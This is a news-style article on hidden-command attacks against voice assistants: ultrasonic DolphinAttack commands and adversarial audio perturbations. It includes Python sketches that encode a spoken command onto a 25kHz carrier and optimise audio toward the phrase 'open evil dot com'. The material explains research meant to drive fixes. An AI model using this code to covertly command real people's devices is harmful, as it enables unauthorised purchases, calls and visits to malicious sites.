Alexa and Siri can hear this hidden command. You can't.

The researchers say it's likely that bad actors are already carrying out these attacks on people's voice-activated devices.

Voice assistant technology such as Amazon's Alexa and Apple's Siri is growing in popularity. Researchers embedded hidden commands inside normal audio, like recorded speech or even music, and used them to instruct smart devices to visit malicious sites, initiate calls, take pictures and send messages.

Pictured, a graphic explains how the stealthy attack works.

While you might think you're listening to an audiobook or a piece of classical music, your smart speaker could be receiving a litany of commands telling it to change its settings or purchase items from your Amazon account. Attackers could leverage this vulnerability to control voice-enabled smart devices such as Amazon Echo, Apple HomePod or Google Home speakers, as well as smartphones, without users ever becoming aware of the backdoor access.

Researchers at Princeton and China's Zhejiang University have demonstrated what they are calling the "DolphinAttack", which hides commands in frequencies too high for the human ear to pick up. "We want to demonstrate that it's possible, and then hope that other people will say, 'OK, this is possible, now let's try and fix it,'" the researchers said.

Apple said its smart speaker, HomePod, is designed to prevent commands from doing things like unlocking doors; it noted that iPhones and iPads must be unlocked before Siri will act on commands that access sensitive data or open apps and websites, among other measures.

Earlier this month, researchers at the University of California, Berkeley published a research paper that moved the needle even further. They were able to secretly activate the three AI assistants, making them dial phone numbers or open websites. Google, meanwhile, just this week announced more native control over kitchen appliances and a strikingly human-sounding AI that can make calls on your behalf to set up appointments.

The team was able to launch the attacks, which use frequencies higher than 20kHz, with less than £2.20 ($3) of equipment attached to a Galaxy S6 Edge.
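Published descriptions of these ultrasonic attacks say the spoken command is amplitude-modulated onto a carrier above 20kHz; the phone's microphone hardware then inadvertently demodulates it back into the audible band that the assistant processes. Purely as a rough sketch of the signal-generation step (the file name, carrier frequency and sample rate below are assumptions, not the researchers' actual setup):

```python
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000   # assumed ultrasonic carrier, above the ~20kHz limit of human hearing
OUT_RATE = 96_000     # output sample rate high enough to represent the carrier

# Load a recorded voice command (hypothetical file name).
rate, voice = wavfile.read("hey_siri_command.wav")
if voice.ndim > 1:
    voice = voice[:, 0]                    # keep one channel if the file is stereo
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))             # normalise to [-1, 1]

# Resample the command to the higher output rate (simple linear interpolation).
t_in = np.arange(len(voice)) / rate
t_out = np.arange(0.0, t_in[-1], 1.0 / OUT_RATE)
voice_up = np.interp(t_out, t_in, voice)

# Amplitude-modulate the command onto the ultrasonic carrier: the signal's energy
# now sits around 25kHz, outside the range most people can hear.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_out)
modulated = 0.5 * (1.0 + voice_up) * carrier

wavfile.write("ultrasonic_command.wav", OUT_RATE, (modulated * 32767).astype(np.int16))
```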

Researchers tested Apple iPhone models from the iPhone 4s to the iPhone 7 Plus, the Apple Watch, Apple iPad mini 4, Apple MacBook, LG Nexus 5X, Asus Nexus 7, Samsung Galaxy S6 Edge, Huawei Honor 7, Lenovo ThinkPad T440p, Amazon Echo and Audi Q3. Speech-recognition systems typically translate each sound to a letter, and compile these into words and phrases.
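That letter-by-letter step is what the newer attacks target. Purely as an illustration of the idea (not any particular assistant's actual pipeline), a recogniser might pick the most likely letter for each short slice of audio and then collapse repeats and blanks into words:

```python
# Minimal sketch of collapsing per-frame letter predictions into text,
# in the style of CTC decoding. The frame predictions here are made up.
BLANK = "_"

def collapse(frame_letters):
    out = []
    prev = None
    for ch in frame_letters:
        if ch != prev and ch != BLANK:
            out.append(ch)
        prev = ch
    return "".join(out)

# e.g. ten audio frames whose most likely letters spell "open"
frames = ["o", "o", "_", "p", "p", "_", "e", "_", "n", "n"]
print(collapse(frames))   # -> "open"
```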

Researchers say the fault is due to both software and hardware issues.

By making slight changes to audio files, researchers were able to cancel out the sound that the speech-recognition system was supposed to hear and replace it with a sound that machines would transcribe differently while being almost undetectable to the human ear.

It is also an area where the law has yet to catch up: there is very little legislation covering subliminal messages sent to humans, and no laws at all against sending inaudible commands to other people's machines.
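The Berkeley work frames this as an optimisation problem: starting from the original recording, search for the smallest perturbation that pushes the recogniser's transcription toward an attacker-chosen phrase. The sketch below is only a toy illustration of that loop; the tiny untrained network, the target phrase and every parameter are stand-ins, not the production speech models or code the researchers actually attacked.

```python
import torch
import torch.nn as nn

# Stand-in recogniser: maps a waveform to per-frame letter logits. The real
# attacks targeted full speech-to-text models; an untrained toy network is
# used here only so the optimisation loop below runs end to end.
ALPHABET = "_abcdefghijklmnopqrstuvwxyz "   # index 0 is the CTC blank

model = nn.Sequential(
    nn.Conv1d(1, 32, kernel_size=400, stride=160),   # ~25 ms frames at 16 kHz
    nn.ReLU(),
    nn.Conv1d(32, len(ALPHABET), kernel_size=1),
)

def logits(waveform):
    # waveform: (samples,) -> (frames, batch, letters), as CTCLoss expects
    x = waveform.view(1, 1, -1)
    return model(x).permute(2, 0, 1).log_softmax(-1)

# Original audio (one second of silence as a placeholder) and the phrase the
# attacker wants the machine to hear instead.
audio = torch.zeros(16_000)
target_text = "open evil dot com"
target = torch.tensor([[ALPHABET.index(c) for c in target_text]])

# Only the perturbation is optimised; keeping it tiny is what makes the
# altered audio nearly indistinguishable to a human listener.
delta = torch.zeros_like(audio, requires_grad=True)
opt = torch.optim.Adam([delta], lr=1e-3)
ctc = nn.CTCLoss(blank=0)

for step in range(200):
    out = logits(audio + delta.clamp(-0.01, 0.01))    # bound the change
    loss = ctc(out,
               target,
               torch.tensor([out.shape[0]]),
               torch.tensor([target.shape[1]]))
    opt.zero_grad()
    loss.backward()
    opt.step()
```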
